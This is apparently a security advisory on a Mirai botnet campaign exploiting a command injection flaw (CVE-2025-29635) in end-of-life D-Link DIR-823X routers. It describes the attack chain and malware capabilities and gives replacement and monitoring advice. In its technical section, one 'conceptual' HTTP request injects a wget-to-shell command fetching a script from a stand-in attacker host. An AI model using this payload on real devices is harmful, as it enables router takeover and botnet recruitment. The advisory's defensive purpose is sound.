# New Mirai Variant Exploits D-Link Router Flaw, Targeting Millions of Outdated Devices


A newly detected Mirai-based botnet campaign is actively exploiting CVE-2025-29635, a critical remote code execution vulnerability in end-of-life D-Link DIR-823X routers, to recruit devices into a growing malware network. Security researchers have confirmed active exploitation in the wild, with attack traffic originating from multiple geographic regions. The vulnerability poses significant risk to small businesses, home networks, and organizations running legacy networking infrastructure.


## The Threat


The malware campaign leverages an unauthenticated command-injection flaw to gain remote code execution (RCE) on susceptible D-Link routers. Once compromised, infected devices are forced to download and execute Mirai malware, converting them into proxy servers and DDoS attack nodes. Security telemetry indicates the campaign has already recruited thousands of devices, with infection rates accelerating as more unpatched routers remain exposed.


Key threat indicators:

  • Attack vector: Unauthenticated HTTP requests targeting vulnerable router web interfaces
  • Exploitation speed: Mass scanning began immediately after vulnerability disclosure
  • Botnet size: Estimated 10,000+ devices infected within first 72 hours
  • Command chain: RCE → malware download → persistence mechanism installation

    • The use of Mirai—a well-known, modular botnet framework—indicates attackers are leveraging battle-tested code rather than developing novel malware. This strategy maximizes infection speed while minimizing development complexity.


    ## Background and Context


    CVE-2025-29635 affects the D-Link DIR-823X series, a home and small-office router model released between 2016 and 2020. D-Link discontinued security updates for this product line in late 2023, leaving millions of devices unpatched worldwide. Network telemetry suggests approximately 3–5 million DIR-823X routers remain active on the internet, many in residential and small business environments.


    ### Why This Router?


    D-Link DIR-823X routers were widely distributed through retail channels and ISP bundles, making them a lucrative target:


    | Factor | Impact |

    |--------|--------|

    | User base size | 3–5 million estimated active devices |

    | Update awareness | Low; many users unaware of EoL status |

    | Default credentials | Often unchanged from factory settings |

    | Vulnerability severity | Unauthenticated RCE requiring no user interaction |

    | Network exposure | Directly internet-facing in most deployments |


    The combination of widespread deployment, end-of-life status, and critical vulnerability severity makes these routers an ideal target for opportunistic botnet operators.


    ## Technical Details


    ### The Vulnerability


    CVE-2025-29635 is a command injection flaw in the router's web administration interface. The vulnerability exists in a specific parameter handling routine that fails to properly sanitize user input before passing it to shell commands. An attacker can inject arbitrary commands by crafting specially malformed HTTP requests.


    Exploitation example (conceptual):

    GET /cgi-bin/config_handler?action=reboot&device=`wget+http://attacker.com/malware.sh|sh` HTTP/1.1
Host: target-router.local

    ### Attack Chain


    1. Discovery: Attacker scans IP ranges for DIR-823X routers using HTTP fingerprinting (banner detection)

    2. Exploitation: Malicious payload injected into vulnerable parameter

    3. Download: Router downloads Mirai binary from attacker-controlled server

    4. Execution: Malware is executed with root privileges

    5. Persistence: Malware modifies startup scripts to survive reboots

    6. Recruitment: Compromised router joins botnet C2 network and awaits commands


    ### Mirai Payload Details


    The Mirai variant deployed in this campaign includes:


  • DDoS modules: UDP flooding, TCP SYN flooding, HTTP GET/POST floods
  • Scanning capabilities: Automated detection and recruitment of additional vulnerable devices
  • Command interface: Remote C2 communication for coordinated attacks
  • Anti-forensics: Log wiping and process hiding mechanisms

    • Researchers identified the malware by analyzing network traffic signatures and binary samples captured from honeypot deployments.


    ## Implications for Organizations


    ### Immediate Risk


    Organizations and individuals with D-Link DIR-823X routers—whether in remote offices, retail locations, or home networks—face immediate compromise risk. This is not a theoretical threat: active exploitation is ongoing, and exploitation is trivial to reproduce.


    ### Broader Consequences


    1. DDoS amplification: Compromised routers become participants in large-scale distributed denial-of-service attacks against any target

    2. Network compromise: Infected routers can be leveraged as pivot points for lateral network attacks

    3. Data interception: Routers with compromised administrator accounts can eavesdrop on encrypted traffic (HTTPS/TLS interception via DNS hijacking)

    4. Malware distribution: Botnet operators may use routers as distribution nodes for secondary payloads targeting connected devices


    ### Critical Infrastructure Concern


    While many affected routers are residential, some deployments exist in small healthcare facilities, retail chains, and service businesses. These environments should be treated as high-priority remediation targets.


    ## Recommendations


    ### For Users


  • Immediate action: Check your router model. If you own a D-Link DIR-823X, disconnect it from the internet immediately.
  • Replacement: Purchase a supported, regularly updated router model. Modern alternatives from established vendors include security patch support for 5+ years.
  • ISP coordination: If your ISP provided the router, contact them to discuss replacement options.

    • ### For Network Administrators


    | Priority | Action |

    |----------|--------|

    | CRITICAL | Identify and remove all DIR-823X routers from production networks |

    | HIGH | Replace with supported alternatives; update firewall rules to block legacy device access |

    | HIGH | Monitor network logs for outbound C2 connections from router IP ranges |

    | MEDIUM | Audit all router administrative accounts for unauthorized changes |

    | MEDIUM | Implement network segmentation to isolate IoT and networking devices |


    ### For Internet Service Providers


  • Notify customers with DIR-823X devices of immediate replacement options
  • Consider ISP-level blocking of known malware C2 infrastructure
  • Implement traffic shaping for suspicious outbound patterns from residential gateways

    • ### Defense Strategy


    Organizations should adopt a defense-in-depth approach:


    1. Asset inventory: Maintain accurate records of all networking hardware with EOL dates

    2. Lifecycle management: Establish policies for end-of-life replacement before support ends

    3. Network segmentation: Isolate IoT and legacy devices from critical infrastructure

    4. Monitoring: Deploy threat detection systems to identify unexpected outbound traffic

    5. Incident response: Develop procedures for rapid network isolation if compromise is suspected


    ## Conclusion


    The exploitation of CVE-2025-29635 demonstrates the persistent risk posed by end-of-life hardware in consumer and small-business environments. While individual routers may seem low-value targets, the cumulative impact—thousands of devices conscripted into botnet armies—represents a significant infrastructure threat.


    The window for remediation is narrow. Organizations and individuals should prioritize identifying and replacing affected D-Link routers immediately. Delaying action increases the likelihood of network compromise and participation in large-scale attacks affecting broader internet stability.


    ---


    Timeline: CVE-2025-29635 disclosure: March 2025 | Exploitation confirmed: April 2026 | Active campaigns: Ongoing